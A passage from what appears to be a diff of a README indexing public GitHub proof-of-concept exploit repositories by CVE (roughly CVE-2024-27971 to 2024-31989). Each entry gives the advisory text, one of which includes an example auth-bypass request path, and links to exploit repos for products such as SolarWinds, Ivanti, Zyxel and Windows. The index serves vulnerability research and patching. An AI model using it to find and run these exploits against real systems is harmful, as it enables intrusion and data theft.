[truonghuuphuc/CVE-2024-27971-Note](https://github.com/truonghuuphuc/CVE-2024-27971-Note) + +### CVE-2024-27972 (2024-04-03) + +Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Very Good Plugins WP Fusion Lite allows Command Injection.This issue affects WP Fusion Lite: from n/a through 3.41.24.\n\n + + +- [truonghuuphuc/CVE-2024-27972-Poc](https://github.com/truonghuuphuc/CVE-2024-27972-Poc) + +### CVE-2024-27983 (2024-04-09) + +An attacker can make the Node.js HTTP/2 server completely unavailable by sending a small amount of HTTP/2 frames packets with a few HTTP/2 frames inside. It is possible to leave some data in nghttp2 memory after reset when headers with HTTP/2 CONTINUATION frame are sent to the server and then a TCP connection is abruptly closed by the client triggering the Http2Session destructor while header frames are still being processed (and stored in memory) causing a race condition. + + +- [lirantal/CVE-2024-27983-nodejs-http2](https://github.com/lirantal/CVE-2024-27983-nodejs-http2) + +### CVE-2024-28000 (2024-08-21) + +Incorrect Privilege Assignment vulnerability in LiteSpeed Technologies LiteSpeed Cache litespeed-cache allows Privilege Escalation.This issue affects LiteSpeed Cache: from 1.9 through 6.3.0.1. + + +- [Alucard0x1/CVE-2024-28000](https://github.com/Alucard0x1/CVE-2024-28000) +- [ebrasha/CVE-2024-28000](https://github.com/ebrasha/CVE-2024-28000) +- [arch1m3d/CVE-2024-28000](https://github.com/arch1m3d/CVE-2024-28000) +- [SSSSuperX/CVE-2024-28000](https://github.com/SSSSuperX/CVE-2024-28000) +- [JohnDoeAnonITA/CVE-2024-28000](https://github.com/JohnDoeAnonITA/CVE-2024-28000) + +### CVE-2024-28085 (2024-03-27) + +wall in util-linux through 2.40, often installed with setgid tty permissions, allows escape sequences to be sent to other users' terminals through argv. (Specifically, escape sequences received from stdin are blocked, but escape sequences received from argv are not blocked.) There may be plausible scenarios where this leads to account takeover. + + +- [skyler-ferrante/CVE-2024-28085](https://github.com/skyler-ferrante/CVE-2024-28085) +- [oditynet/sleepall](https://github.com/oditynet/sleepall) + +### CVE-2024-28088 (2024-03-03) + +LangChain through 0.1.10 allows ../ directory traversal by an actor who is able to control the final part of the path parameter in a load_chain call. This bypasses the intended behavior of loading configurations only from the hwchase17/langchain-hub GitHub repository. The outcome can be disclosure of an API key for a large language model online service, or remote code execution. (A patch is available as of release 0.1.29 of langchain-core.) + + +- [levpachmanov/cve-2024-28088-poc](https://github.com/levpachmanov/cve-2024-28088-poc) + +### CVE-2024-28116 (2024-03-21) + +Grav is an open-source, flat-file content management system. Grav CMS prior to version 1.7.45 is vulnerable to a Server-Side Template Injection (SSTI), which allows any authenticated user (editor permissions are sufficient) to execute arbitrary code on the remote server bypassing the existing security sandbox. Version 1.7.45 contains a patch for this issue. + + +- [akabe1/Graver](https://github.com/akabe1/Graver) +- [gunzf0x/Grav-CMS-RCE-Authenticated](https://github.com/gunzf0x/Grav-CMS-RCE-Authenticated) +- [geniuszlyy/GenGravSSTIExploit](https://github.com/geniuszlyy/GenGravSSTIExploit) + +### CVE-2024-28247 (2024-03-27) + +The Pi-hole is a DNS sinkhole that protects your devices from unwanted content without installing any client-side software. A vulnerability has been discovered in Pihole that allows an authenticated user on the platform to read internal server files arbitrarily, and because the application runs from behind, reading files is done as a privileged user.If the URL that is in the list of "Adslists" begins with "file*" it is understood that it is updating from a local file, on the other hand if it does not begin with "file*" depending on the state of the response it does one thing or another. The problem resides in the update through local files. When updating from a file which contains non-domain lines, 5 of the non-domain lines are printed on the screen, so if you provide it with any file on the server which contains non-domain lines it will print them on the screen. This vulnerability is fixed by 5.18. + + +- [T0X1Cx/CVE-2024-28247-Pi-hole-Arbitrary-File-Read](https://github.com/T0X1Cx/CVE-2024-28247-Pi-hole-Arbitrary-File-Read) + +### CVE-2024-28255 (2024-03-15) + +OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. The `JwtFilter` handles the API authentication by requiring and verifying JWT tokens. When a new request comes in, the request's path is checked against this list. When the request's path contains any of the excluded endpoints the filter returns without validating the JWT. Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings. For example, a request to `GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/111` will match the excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the authentication mechanism and reach any arbitrary endpoint, including the ones listed above that lead to arbitrary SpEL expression injection. This bypass will not work when the endpoint uses the `SecurityContext.getUserPrincipal()` since it will return `null` and will throw an NPE. This issue may lead to authentication bypass and has been addressed in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as `GHSL-2023-237`. + + +- [YongYe-Security/CVE-2024-28255](https://github.com/YongYe-Security/CVE-2024-28255) + +### CVE-2024-28397 (2024-06-20) + +An issue in the component js2py.disable_pyimport() of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call. + + +- [Marven11/CVE-2024-28397-js2py-Sandbox-Escape](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape) +- [CYBER-WARRIOR-SEC/CVE-2024-28397-js2py-Sandbox-Escape](https://github.com/CYBER-WARRIOR-SEC/CVE-2024-28397-js2py-Sandbox-Escape) + +### CVE-2024-28515 (2024-04-03) + +Buffer Overflow vulnerability in CSAPP_Lab CSAPP Lab3 15-213 Fall 20xx allows a remote attacker to execute arbitrary code via the lab3 of csapp,lab3/buflab-update.pl component. + + +- [heshi906/CVE-2024-28515](https://github.com/heshi906/CVE-2024-28515) + +### CVE-2024-28589 (2024-04-03) + +An issue was discovered in Axigen Mail Server for Windows versions 10.5.18 and before, allows local low-privileged attackers to execute arbitrary code and escalate privileges via insecure DLL loading from a world-writable directory during service initialization. + + +- [Alaatk/CVE-2024-28589](https://github.com/Alaatk/CVE-2024-28589) + +### CVE-2024-28715 (2024-03-19) + +Cross Site Scripting vulnerability in DOraCMS v.2.18 and before allows a remote attacker to execute arbitrary code via the markdown0 function in the /app/public/apidoc/oas3/wrap-components/markdown.jsx endpoint. + + +- [Lq0ne/CVE-2024-28715](https://github.com/Lq0ne/CVE-2024-28715) + +### CVE-2024-28741 (2024-04-06) + +Cross Site Scripting vulnerability in EginDemirbilek NorthStar C2 v1 allows a remote attacker to execute arbitrary code via the login.php component. + + +- [chebuya/CVE-2024-28741-northstar-agent-rce-poc](https://github.com/chebuya/CVE-2024-28741-northstar-agent-rce-poc) + +### CVE-2024-28757 (2024-03-10) + +libexpat through 2.6.1 allows an XML Entity Expansion attack when there is isolated use of external parsers (created via XML_ExternalEntityParserCreate). + + +- [RenukaSelvar/expat_CVE-2024-28757](https://github.com/RenukaSelvar/expat_CVE-2024-28757) +- [saurabh2088/expat_2_1_0_CVE-2024-28757](https://github.com/saurabh2088/expat_2_1_0_CVE-2024-28757) +- [saurabh2088/expat_2_1_1_CVE-2024-28757](https://github.com/saurabh2088/expat_2_1_1_CVE-2024-28757) + +### CVE-2024-28987 (2024-08-21) + +The SolarWinds Web Help Desk (WHD) software is affected by a hardcoded credential vulnerability, allowing remote unauthenticated user to access internal functionality and modify data. + + +- [gh-ost00/CVE-2024-28987-POC](https://github.com/gh-ost00/CVE-2024-28987-POC) +- [horizon3ai/CVE-2024-28987](https://github.com/horizon3ai/CVE-2024-28987) +- [PlayerFridei/CVE-2024-28987](https://github.com/PlayerFridei/CVE-2024-28987) +- [expl0itsecurity/CVE-2024-28987](https://github.com/expl0itsecurity/CVE-2024-28987) + +### CVE-2024-28995 (2024-06-06) + +\n\n\n\n\n\n\n\n\n\n\n\nSolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine. \n\n\n\n\n\n\n\n + + +- [krypton-kry/CVE-2024-28995](https://github.com/krypton-kry/CVE-2024-28995) +- [ggfzx/CVE-2024-28995](https://github.com/ggfzx/CVE-2024-28995) +- [huseyinstif/CVE-2024-28995-Nuclei-Template](https://github.com/huseyinstif/CVE-2024-28995-Nuclei-Template) +- [0xc4t/CVE-2024-28995](https://github.com/0xc4t/CVE-2024-28995) +- [bigb0x/CVE-2024-28995](https://github.com/bigb0x/CVE-2024-28995) +- [muhammetali20/CVE-2024-28995](https://github.com/muhammetali20/CVE-2024-28995) +- [Praison001/CVE-2024-28995-SolarWinds-Serv-U](https://github.com/Praison001/CVE-2024-28995-SolarWinds-Serv-U) +- [Stuub/CVE-2024-28995](https://github.com/Stuub/CVE-2024-28995) +- [gotr00t0day/CVE-2024-28995](https://github.com/gotr00t0day/CVE-2024-28995) + +### CVE-2024-28999 (2024-06-04) + +The SolarWinds Platform was determined to be affected by a Race Condition Vulnerability affecting the web console. + + +- [HussainFathy/CVE-2024-28999](https://github.com/HussainFathy/CVE-2024-28999) + +### CVE-2024-29050 (2024-04-09) + +Windows Cryptographic Services Remote Code Execution Vulnerability + + +- [Akrachli/CVE-2024-29050](https://github.com/Akrachli/CVE-2024-29050) + +### CVE-2024-29059 (2024-03-22) + +.NET Framework Information Disclosure Vulnerability + + +- [codewhitesec/HttpRemotingObjRefLeak](https://github.com/codewhitesec/HttpRemotingObjRefLeak) + +### CVE-2024-29269 (2024-04-10) + +An issue discovered in Telesquare TLR-2005Ksh 1.0.0 and 1.1.4 allows attackers to run arbitrary system commands via the Cmd parameter. + + +- [wutalent/CVE-2024-29269](https://github.com/wutalent/CVE-2024-29269) +- [YongYe-Security/CVE-2024-29269](https://github.com/YongYe-Security/CVE-2024-29269) +- [Chocapikk/CVE-2024-29269](https://github.com/Chocapikk/CVE-2024-29269) +- [dream434/CVE-2024-29269](https://github.com/dream434/CVE-2024-29269) +- [K3ysTr0K3R/CVE-2024-29269-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-29269-EXPLOIT) +- [hack-with-rohit/CVE-2024-29269-RCE](https://github.com/hack-with-rohit/CVE-2024-29269-RCE) +- [Quantum-Hacker/CVE-2024-29269](https://github.com/Quantum-Hacker/CVE-2024-29269) + +### CVE-2024-29272 (2024-03-22) + +Arbitrary File Upload vulnerability in VvvebJs before version 1.7.5, allows unauthenticated remote attackers to execute arbitrary code and obtain sensitive information via the sanitizeFileName parameter in save.php. + + +- [awjkjflkwlekfdjs/CVE-2024-29272](https://github.com/awjkjflkwlekfdjs/CVE-2024-29272) + +### CVE-2024-29275 (2024-03-22) + +SQL injection vulnerability in SeaCMS version 12.9, allows remote unauthenticated attackers to execute arbitrary code and obtain sensitive information via the id parameter in class.php. + + +- [Cyphercoda/nuclei_template](https://github.com/Cyphercoda/nuclei_template) + +### CVE-2024-29278 (2024-03-30) + +funboot v1.1 is vulnerable to Cross Site Scripting (XSS) via the title field in "create a message ." + + +- [QDming/cve](https://github.com/QDming/cve) + +### CVE-2024-29296 (2024-04-10) + +A user enumeration vulnerability was found in Portainer CE 2.19.4. This issue occurs during user authentication process, where a difference in response time could allow a remote unauthenticated user to determine if a username is valid or not. + + +- [ThaySolis/CVE-2024-29296](https://github.com/ThaySolis/CVE-2024-29296) +- [Lavender-exe/CVE-2024-29296-PoC](https://github.com/Lavender-exe/CVE-2024-29296-PoC) + +### CVE-2024-29375 (2024-04-04) + +CSV Injection vulnerability in Addactis IBNRS v.3.10.3.107 allows a remote attacker to execute arbitrary code via a crafted .ibnrs file to the Project Description, Identifiers, Custom Triangle Name (inside Input Triangles) and Yield Curve Name parameters. + + +- [ismailcemunver/CVE-2024-29375](https://github.com/ismailcemunver/CVE-2024-29375) + +### CVE-2024-29399 (2024-04-11) + +An issue was discovered in GNU Savane v.3.13 and before, allows a remote attacker to execute arbitrary code and escalate privileges via a crafted file to the upload.php component. + + +- [ally-petitt/CVE-2024-29399](https://github.com/ally-petitt/CVE-2024-29399) + +### CVE-2024-29404 +- [mansk1es/CVE-2024-29404_Razer](https://github.com/mansk1es/CVE-2024-29404_Razer) + +### CVE-2024-29415 (-) + +The ip package through 2.0.1 for Node.js might allow SSRF because some IP addresses (such as 127.1, 01200034567, 012.1.2.3, 000:0:0000::01, and ::fFFf:127.0.0.1) are improperly categorized as globally routable via isPublic. NOTE: this issue exists because of an incomplete fix for CVE-2023-42282. + + +- [felipecruz91/node-ip-vex](https://github.com/felipecruz91/node-ip-vex) + +### CVE-2024-29510 (2024-07-03) + +Artifex Ghostscript before 10.03.1 allows memory corruption, and SAFER sandbox bypass, via format string injection with a uniprint device. + + +- [swsmith2391/CVE-2024-29510](https://github.com/swsmith2391/CVE-2024-29510) + +### CVE-2024-29671 +- [laskdjlaskdj12/CVE-2024-29671-POC](https://github.com/laskdjlaskdj12/CVE-2024-29671-POC) + +### CVE-2024-29824 (2024-05-31) + +An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code. + + +- [horizon3ai/CVE-2024-29824](https://github.com/horizon3ai/CVE-2024-29824) +- [R4be1/CVE-2024-29824](https://github.com/R4be1/CVE-2024-29824) + +### CVE-2024-29847 (2024-09-12) + +Deserialization of untrusted data in the agent portal of Ivanti EPM before 2022 SU6, or the 2024 September update allows a remote unauthenticated attacker to achieve remote code execution. + + +- [sinsinology/CVE-2024-29847](https://github.com/sinsinology/CVE-2024-29847) + +### CVE-2024-29849 (2024-05-22) + +Veeam Backup Enterprise Manager allows unauthenticated users to log in as any user to enterprise manager web interface. + + +- [sinsinology/CVE-2024-29849](https://github.com/sinsinology/CVE-2024-29849) + +### CVE-2024-29855 (2024-06-11) + +Hard-coded JWT secret allows authentication bypass in Veeam Recovery Orchestrator + + +- [sinsinology/CVE-2024-29855](https://github.com/sinsinology/CVE-2024-29855) + +### CVE-2024-29863 (2024-04-05) + +A race condition in the installer executable in Qlik Qlikview before versions May 2022 SR3 (12.70.20300) and May 2023 SR2 (12,80.20200) may allow an existing lower privileged user to cause code to be executed in the context of a Windows Administrator. + + +- [pawlokk/qlikview-poc-CVE-2024-29863](https://github.com/pawlokk/qlikview-poc-CVE-2024-29863) + +### CVE-2024-29868 (2024-06-24) + +Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) vulnerability in Apache StreamPipes user self-registration and password recovery mechanism.\nThis allows an attacker to guess the recovery token in a reasonable time and thereby to take over the attacked user's account.\nThis issue affects Apache StreamPipes: from 0.69.0 through 0.93.0.\n\nUsers are recommended to upgrade to version 0.95.0, which fixes the issue.\n\n + + +- [DEVisions/CVE-2024-29868](https://github.com/DEVisions/CVE-2024-29868) + +### CVE-2024-29895 (2024-05-13) + +Cacti provides an operational monitoring and fault management framework. A command injection vulnerability on the 1.3.x DEV branch allows any unauthenticated user to execute arbitrary command on the server when `register_argc_argv` option of PHP is `On`. In `cmd_realtime.php` line 119, the `$poller_id` used as part of the command execution is sourced from `$_SERVER['argv']`, which can be controlled by URL when `register_argc_argv` option of PHP is `On`. And this option is `On` by default in many environments such as the main PHP Docker image for PHP. Commit 53e8014d1f082034e0646edc6286cde3800c683d contains a patch for the issue, but this commit was reverted in commit 99633903cad0de5ace636249de16f77e57a3c8fc. + + +- [Stuub/CVE-2024-29895-CactiRCE-PoC](https://github.com/Stuub/CVE-2024-29895-CactiRCE-PoC) +- [secunnix/CVE-2024-29895](https://github.com/secunnix/CVE-2024-29895) +- [ticofookfook/CVE-2024-29895.py](https://github.com/ticofookfook/CVE-2024-29895.py) +- [Rubioo02/CVE-2024-29895](https://github.com/Rubioo02/CVE-2024-29895) + +### CVE-2024-29943 (2024-03-22) + +An attacker was able to perform an out-of-bounds read or write on a JavaScript object by fooling range-based bounds check elimination. This vulnerability affects Firefox < 124.0.1. + + +- [bjrjk/CVE-2024-29943](https://github.com/bjrjk/CVE-2024-29943) + +### CVE-2024-29972 (2024-06-04) + +** UNSUPPORTED WHEN ASSIGNED **\nThe command injection vulnerability in the CGI program "remote_help-cgi" in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request. + + +- [WanLiChangChengWanLiChang/CVE-2024-29972](https://github.com/WanLiChangChengWanLiChang/CVE-2024-29972) +- [Pommaq/CVE-2024-29972-CVE-2024-29976-CVE-2024-29973-CVE-2024-29975-CVE-2024-29974-poc](https://github.com/Pommaq/CVE-2024-29972-CVE-2024-29976-CVE-2024-29973-CVE-2024-29975-CVE-2024-29974-poc) + +### CVE-2024-29973 (2024-06-04) + +** UNSUPPORTED WHEN ASSIGNED **\nThe command injection vulnerability in the “setCookie” parameter in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request. + + +- [momika233/CVE-2024-29973](https://github.com/momika233/CVE-2024-29973) +- [bigb0x/CVE-2024-29973](https://github.com/bigb0x/CVE-2024-29973) +- [k3lpi3b4nsh33/CVE-2024-29973](https://github.com/k3lpi3b4nsh33/CVE-2024-29973) +- [p0et08/CVE-2024-29973](https://github.com/p0et08/CVE-2024-29973) +- [RevoltSecurities/CVE-2024-29973](https://github.com/RevoltSecurities/CVE-2024-29973) +- [skyrowalker/CVE-2024-29973](https://github.com/skyrowalker/CVE-2024-29973) + +### CVE-2024-29988 (2024-04-09) + +SmartScreen Prompt Security Feature Bypass Vulnerability + + +- [Sploitus/CVE-2024-29988-exploit](https://github.com/Sploitus/CVE-2024-29988-exploit) + +### CVE-2024-30043 (2024-05-14) + +Microsoft SharePoint Server Information Disclosure Vulnerability + + +- [W01fh4cker/CVE-2024-30043-XXE](https://github.com/W01fh4cker/CVE-2024-30043-XXE) + +### CVE-2024-30051 (2024-05-14) + +Windows DWM Core Library Elevation of Privilege Vulnerability + + +- [fortra/CVE-2024-30051](https://github.com/fortra/CVE-2024-30051) + +### CVE-2024-30052 (2024-06-11) + +Visual Studio Remote Code Execution Vulnerability + + +- [ynwarcs/CVE-2024-30052](https://github.com/ynwarcs/CVE-2024-30052) + +### CVE-2024-30056 (2024-05-25) + +Microsoft Edge (Chromium-based) Information Disclosure Vulnerability + + +- [absholi7ly/Microsoft-Edge-Information-Disclosure](https://github.com/absholi7ly/Microsoft-Edge-Information-Disclosure) + +### CVE-2024-30088 (2024-06-11) + +Windows Kernel Elevation of Privilege Vulnerability + + +- [tykawaii98/CVE-2024-30088](https://github.com/tykawaii98/CVE-2024-30088) +- [NextGenPentesters/CVE-2024-30088-](https://github.com/NextGenPentesters/CVE-2024-30088-) +- [Zombie-Kaiser/CVE-2024-30088-Windows-poc](https://github.com/Zombie-Kaiser/CVE-2024-30088-Windows-poc) +- [exploits-forsale/collateral-damage](https://github.com/exploits-forsale/collateral-damage) +- [Admin9961/CVE-2024-30088](https://github.com/Admin9961/CVE-2024-30088) +- [Justintroup85/exploits-forsale-collateral-damage](https://github.com/Justintroup85/exploits-forsale-collateral-damage) + +### CVE-2024-30090 (2024-06-11) + +Microsoft Streaming Service Elevation of Privilege Vulnerability + + +- [Dor00tkit/CVE-2024-30090](https://github.com/Dor00tkit/CVE-2024-30090) + +### CVE-2024-30212 (2024-05-28) + +If a SCSI READ(10) command is initiated via USB using the largest LBA \n(0xFFFFFFFF) with it's default block size of 512 and a count of 1,\n\nthe first 512 byte of the 0x80000000 memory area is returned to the \nuser. If the block count is increased, the full RAM can be exposed.\n\nThe same method works to write to this memory area. If RAM contains \npointers, those can be - depending on the application - overwritten to\n\nreturn data from any other offset including Progam and Boot Flash. + + +- [Fehr-GmbH/blackleak](https://github.com/Fehr-GmbH/blackleak) + +### CVE-2024-30255 (2024-04-04) + +Envoy is a cloud-native, open source edge and service proxy. The HTTP/2 protocol stack in Envoy versions prior to 1.29.3, 1.28.2, 1.27.4, and 1.26.8 are vulnerable to CPU exhaustion due to flood of CONTINUATION frames. Envoy's HTTP/2 codec allows the client to send an unlimited number of CONTINUATION frames even after exceeding Envoy's header map limits. This allows an attacker to send a sequence of CONTINUATION frames without the END_HEADERS bit set causing CPU utilization, consuming approximately 1 core per 300Mbit/s of traffic and culminating in denial of service through CPU exhaustion. Users should upgrade to version 1.29.3, 1.28.2, 1.27.4, or 1.26.8 to mitigate the effects of the CONTINUATION flood. As a workaround, disable HTTP/2 protocol for downstream connections. + + +- [blackmagic2023/Envoy-CPU-Exhaustion-Vulnerability-PoC](https://github.com/blackmagic2023/Envoy-CPU-Exhaustion-Vulnerability-PoC) + +### CVE-2024-30270 (2024-04-04) + +mailcow: dockerized is an open source groupware/email suite based on docker. A security vulnerability has been identified in mailcow affecting versions prior to 2024-04. This vulnerability is a combination of path traversal and arbitrary code execution, specifically targeting the `rspamd_maps()` function. It allows authenticated admin users to overwrite any file writable by the www-data user by exploiting improper path validation. The exploit chain can lead to the execution of arbitrary commands on the server. Version 2024-04 contains a patch for the issue. + + +- [Alchemist3dot14/CVE-2024-30270-PoC](https://github.com/Alchemist3dot14/CVE-2024-30270-PoC) + +### CVE-2024-30491 (2024-03-29) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Metagauss ProfileGrid.This issue affects ProfileGrid : from n/a through 5.7.8.\n\n + + +- [truonghuuphuc/CVE-2024-30491-Poc](https://github.com/truonghuuphuc/CVE-2024-30491-Poc) + +### CVE-2024-30614 (2024-04-12) + +An issue in Ametys CMS v4.5.0 and before allows attackers to obtain sensitive information via exposed resources to the error scope. + + +- [Lucky-lm/CVE-2024-30614](https://github.com/Lucky-lm/CVE-2024-30614) + +### CVE-2024-30656 (2024-04-15) + +An issue in Fireboltt Dream Wristphone BSW202_FB_AAC_v2.0_20240110-20240110-1956 allows attackers to cause a Denial of Service (DoS) via a crafted deauth frame. + + +- [Yashodhanvivek/Firebolt-wristphone-vulnerability](https://github.com/Yashodhanvivek/Firebolt-wristphone-vulnerability) + +### CVE-2024-30850 (2024-04-12) + +An issue in tiagorlampert CHAOS v5.0.1 allows a remote attacker to execute arbitrary code via the BuildClient function within client_service.go + + +- [chebuya/CVE-2024-30850-chaos-rat-rce-poc](https://github.com/chebuya/CVE-2024-30850-chaos-rat-rce-poc) + +### CVE-2024-30851 (2024-05-03) + +Directory Traversal vulnerability in codesiddhant Jasmin Ransomware v.1.0.1 allows an attacker to obtain sensitive information via the download_file.php component. + + +- [chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc](https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc) + +### CVE-2024-30875 (2024-10-17) + +Cross Site Scripting vulnerability in JavaScript Library jquery-ui v.1.13.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via a crafted payload to the window.addEventListener component. NOTE: this is disputed by the Supplier because it cannot be reproduced, and because the exploitation example does not indicate whether, or how, the example website is using jQuery UI. + + +- [Ant1sec-ops/CVE-2024-30875](https://github.com/Ant1sec-ops/CVE-2024-30875) + +### CVE-2024-30896 (2024-11-21) + +InfluxDB through 2.7.10 allows allAccess administrators to retrieve all raw tokens via an "influx auth ls" command. NOTE: the supplier indicates that this is intentional but is a "poor design choice" that will be changed in a future release. + + +- [XenoM0rph97/CVE-2024-30896](https://github.com/XenoM0rph97/CVE-2024-30896) + +### CVE-2024-30956 +- [leoCottret/CVE-2024-30956](https://github.com/leoCottret/CVE-2024-30956) + +### CVE-2024-30973 (2024-05-06) + +An issue in V-SOL G/EPON ONU HG323AC-B with firmware version V2.0.08-210715 allows an attacker to execute arbtirary code and obtain sensitive information via crafted POST request to /boaform/getASPdata/formFirewall, /boaform/getASPdata/formAcc. + + +- [Athos-Zago/CVE-2024-30973](https://github.com/Athos-Zago/CVE-2024-30973) + +### CVE-2024-30998 (2024-04-03) + +SQL Injection vulnerability in PHPGurukul Men Salon Management System v.2.0, allows remote attackers to execute arbitrary code and obtain sensitive information via the email parameter in the index.php component. + + +- [efekaanakkar/CVE-2024-30998](https://github.com/efekaanakkar/CVE-2024-30998) + +### CVE-2024-31211 (2024-04-04) + +WordPress is an open publishing platform for the Web. Unserialization of instances of the `WP_HTML_Token` class allows for code execution via its `__destruct()` magic method. This issue was fixed in WordPress 6.4.2 on December 6th, 2023. Versions prior to 6.4.0 are not affected. + + +- [Abdurahmon3236/-CVE-2024-31211](https://github.com/Abdurahmon3236/-CVE-2024-31211) + +### CVE-2024-31319 (2024-07-09) + +In updateNotificationChannelFromPrivilegedListener of NotificationManagerService.java, there is a possible cross-user data leak due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [23Nero/fix-02-failure-CVE-2024-31319-CVE-2024-0039](https://github.com/23Nero/fix-02-failure-CVE-2024-31319-CVE-2024-0039) + +### CVE-2024-31351 (2024-05-17) + +Unrestricted Upload of File with Dangerous Type vulnerability in Copymatic Copymatic – AI Content Writer & Generator.This issue affects Copymatic – AI Content Writer & Generator: from n/a through 1.6. + + +- [KTN1990/CVE-2024-31351_wordpress_exploit](https://github.com/KTN1990/CVE-2024-31351_wordpress_exploit) + +### CVE-2024-31497 (2024-04-15) + +In PuTTY 0.68 through 0.80 before 0.81, biased ECDSA nonce generation allows an attacker to recover a user's NIST P-521 secret key via a quick attack in approximately 60 signatures. This is especially important in a scenario where an adversary is able to read messages signed by PuTTY or Pageant. The required set of signed messages may be publicly readable because they are stored in a public Git service that supports use of SSH for commit signing, and the signatures were made by Pageant through an agent-forwarding mechanism. In other words, an adversary may already have enough signature information to compromise a victim's private key, even if there is no further use of vulnerable PuTTY versions. After a key compromise, an adversary may be able to conduct supply-chain attacks on software maintained in Git. A second, independent scenario is that the adversary is an operator of an SSH server to which the victim authenticates (for remote login or file copy), even though this server is not fully trusted by the victim, and the victim uses the same private key for SSH connections to other services operated by other entities. Here, the rogue server operator (who would otherwise have no way to determine the victim's private key) can derive the victim's private key, and then use it for unauthorized access to those other services. If the other services include Git services, then again it may be possible to conduct supply-chain attacks on software maintained in Git. This also affects, for example, FileZilla before 3.67.0, WinSCP before 6.3.3, TortoiseGit before 2.15.0.1, and TortoiseSVN through 1.14.6. + + +- [sh1k4ku/CVE-2024-31497](https://github.com/sh1k4ku/CVE-2024-31497) +- [edutko/cve-2024-31497](https://github.com/edutko/cve-2024-31497) +- [HugoBond/CVE-2024-31497-POC](https://github.com/HugoBond/CVE-2024-31497-POC) + +### CVE-2024-31666 (2024-04-22) + +An issue in flusity-CMS v.2.33 allows a remote attacker to execute arbitrary code via a crafted script to the edit_addon_post.php component. + + +- [hapa3/CVE-2024-31666](https://github.com/hapa3/CVE-2024-31666) + +### CVE-2024-31719 +- [VoltaireYoung/CVE-2024-31719----AMI-Aptio-5-Vulnerability](https://github.com/VoltaireYoung/CVE-2024-31719----AMI-Aptio-5-Vulnerability) + +### CVE-2024-31771 (-) + +Insecure Permission vulnerability in TotalAV v.6.0.740 allows a local attacker to escalate privileges via a crafted file + + +- [restdone/CVE-2024-31771](https://github.com/restdone/CVE-2024-31771) + +### CVE-2024-31777 (2024-06-13) + +File Upload vulnerability in openeclass v.3.15 and before allows an attacker to execute arbitrary code via a crafted file to the certbadge.php endpoint. + + +- [FreySolarEye/Exploit-CVE-2024-31777](https://github.com/FreySolarEye/Exploit-CVE-2024-31777) + +### CVE-2024-31819 (2024-04-10) + +An issue in WWBN AVideo v.12.4 through v.14.2 allows a remote attacker to execute arbitrary code via the systemRootPath parameter of the submitIndex.php component. + + +- [Chocapikk/CVE-2024-31819](https://github.com/Chocapikk/CVE-2024-31819) +- [dream434/CVE-2024-31819](https://github.com/dream434/CVE-2024-31819) + +### CVE-2024-31835 (2024-10-01) + +Cross Site Scripting vulnerability in flatpress CMS Flatpress v1.3 allows a remote attacker to execute arbitrary code via a crafted payload to the file name parameter. + + +- [paragbagul111/CVE-2024-31835](https://github.com/paragbagul111/CVE-2024-31835) + +### CVE-2024-31848 (2024-04-05) + +A path traversal vulnerability exists in the Java version of CData API Server < 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application. + + +- [Stuub/CVE-2024-31848-PoC](https://github.com/Stuub/CVE-2024-31848-PoC) + +### CVE-2024-31974 (-) + +The com.solarized.firedown (aka Solarized FireDown Browser & Downloader) application 1.0.76 for Android allows a remote attacker to execute arbitrary JavaScript code via a crafted intent. com.solarized.firedown.IntentActivity uses a WebView component to display web content and doesn't adequately sanitize the URI or any extra data passed in the intent by any installed application (with no permissions). + + +- [actuator/com.solarized.firedown](https://github.com/actuator/com.solarized.firedown) + +### CVE-2024-31982 (2024-04-10) + +XWiki Platform is a generic wiki platform. Starting in version 2.4-milestone-1 and prior to versions 4.10.20, 15.5.4, and 15.10-rc-1, XWiki's database search allows remote code execution through the search text. This allows remote code execution for any visitor of a public wiki or user of a closed wiki as the database search is by default accessible for all users. This impacts the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 14.10.20, 15.5.4 and 15.10RC1. As a workaround, one may manually apply the patch to the page `Main.DatabaseSearch`. Alternatively, unless database search is explicitly used by users, this page can be deleted as this is not the default search interface of XWiki. + + +- [k3lpi3b4nsh33/CVE-2024-31982](https://github.com/k3lpi3b4nsh33/CVE-2024-31982) +- [th3gokul/CVE-2024-31982](https://github.com/th3gokul/CVE-2024-31982) +- [bigb0x/CVE-2024-31982](https://github.com/bigb0x/CVE-2024-31982) + +### CVE-2024-31989 (2024-05-21) + +Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. It has been discovered that an unprivileged pod in a different namespace on the same cluster could connect to the Redis server on port 6379. Despite having installed the latest version of the VPC CNI plugin on the EKS cluster, it requires manual enablement through configuration to enforce network policies. This raises concerns that many clients might unknowingly have open access to their Redis servers. This vulnerability could lead to Privilege Escalation to the level of cluster controller, or to information leakage, affecting anyone who does not have strict access controls on their Redis instance. This issue has been patched in version(s) 2.8.19, 2.9.15 and 2.10.10. + + +- [vt0x78/CVE-2024-31989](https://github.com/vt0x78/CVE-2024-31989) + +### CVE-2024-32002 